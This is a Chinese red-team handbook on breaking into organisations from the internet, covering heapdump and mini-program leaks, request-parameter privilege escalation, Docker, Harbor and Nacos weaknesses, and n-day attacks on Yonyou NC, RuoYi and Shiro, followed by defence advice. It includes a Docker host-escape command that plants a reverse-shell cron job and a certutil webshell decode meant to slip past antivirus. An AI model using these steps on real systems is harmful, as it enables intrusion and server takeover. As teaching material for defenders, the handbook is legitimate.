[攻防实战]外网突破
字数 1718 2025-08-06 08:35:06
外网突破实战技术手册
1. 供应链攻击技术
1.1 Heapdump泄露利用
- 发现方法:扫描供应商资产admin目录下是否存在heapdump文件
- 利用价值:可获取大量敏感信息,包括密码、配置等,特定情况下可直接RCE
- 典型发现:
- MinIO登录凭证 → 获取目标单位敏感信息
- Nacos配置信息 → 扩展密码本
- OSS访问凭证 → 获取大量业务数据
1.2 微信小程序接口未授权访问
1.2.1 小程序逆向工程
-
获取wxapkg文件路径:
- iOS:
/var/mobile/Containers/Data/Application/{UUID}/Library/WechatPrivate/{user哈希}/WeApp/LocalCache/release/{AppID} - Android:
/data/data/com.tencent.mm/MicroMsg/{user哈希}/appbrand/pkg/ - Windows:
C:\Users\{用户名}\Documents\WeChat Files\Applet\{AppID}\
- iOS:
-
解密工具:
-
解包工具:
- 国光大佬工具包:
node wuWxapkg.js 1.wxapkg
- 国光大佬工具包:
1.2.2 接口利用
- 从解包后的JS代码中提取API接口
- 直接访问接口可能绕过前端验证获取敏感数据
1.3 Web程序越权漏洞
- 利用流程:
- 使用收集的密码进行撞库获取低权限账号
- 拦截组织架构查询请求,删除
parentId和orgLevel参数实现越权 - 通过修改密码接口添加
roleId提升权限
1.4 公众号安全
- JS文件泄露密码 → 用于撞库公众号管理后台
2. 云原生安全突破
2.1 Harbor镜像仓库利用
- Public镜像下载:Harbor允许任意用户下载public镜像
- 批量下载脚本:可编写脚本自动化下载所有公开镜像
2.2 镜像分析
- 从镜像中提取jar包和配置文件
- 反编译class文件进行代码审计
- 发现后门:某些接口仅需用户名即可登录系统
2.3 Docker未授权访问
2.3.1 Registry API未授权
- 检测方法:访问
/v2/_catalog接口 - 利用工具:docker_v2_catalog
2.3.2 Remote API未授权
- 检测:
docker -H tcp://<target>:2375 ps -a - 容器逃逸:
docker -H tcp://<target>:2375 run -it -v /:/mnt nginx:latest /bin/bash echo '反弹shell命令' >> /mnt/var/spool/cron/crontabs/root
2.4 Nacos配置中心
-
未授权漏洞:
- 用户枚举:
/nacos/v1/auth/users?pageNo=1&pageSize=1 - 用户添加:POST
/nacos/v1/auth/users - 密码修改:PUT
/nacos/v1/auth/users?accessToken=
- 用户枚举:
-
Jasypt加密破解:
- 在配置文件中查找加密密钥
jasypt.encryptor.password - 使用Java代码解密:
BasicTextEncryptor textEncryptor = new BasicTextEncryptor(); textEncryptor.setPassword("加密密钥"); String decryptedText = textEncryptor.decrypt("加密文本");
- 在配置文件中查找加密密钥
3. Nday漏洞利用
3.1 用友NC jsInvoke RCE
- 利用方法:通过Java反射调用LDAP服务执行命令
- 绕过杀软:
echo base64马 > file.jsp certutil -decode file.jsp decoded.jsp
3.2 若依系统漏洞
- 信息泄露:获取用户名列表
- 弱口令爆破:进入后台
- 权限提升:猜解高权限账号密码
- 命令执行:通过定时任务功能
3.3 Shiro反序列化
- 检测方法:扫描默认密钥
- 利用要点:即使有统一认证跳转,仍可能存在shiro漏洞
防御建议
-
供应链安全:
- 定期审计供应商系统安全性
- 监控heapdump等敏感文件泄露
- 小程序接口实施严格权限控制
-
云原生安全:
- Harbor配置严格的访问控制
- Docker API实施认证和网络隔离
- Nacos配置中心加密密钥与代码分离
-
漏洞管理:
- 及时更新用友NC、若依等常见系统
- 禁用Shiro默认密钥
- 实施Web应用防火墙规则
-
监控措施:
- 日志分析异常访问模式
- 监控容器逃逸行为
- 敏感操作二次认证
本手册详细记录了从外网突破的多种实战技术路径,安全团队应针对这些攻击面加强防御措施。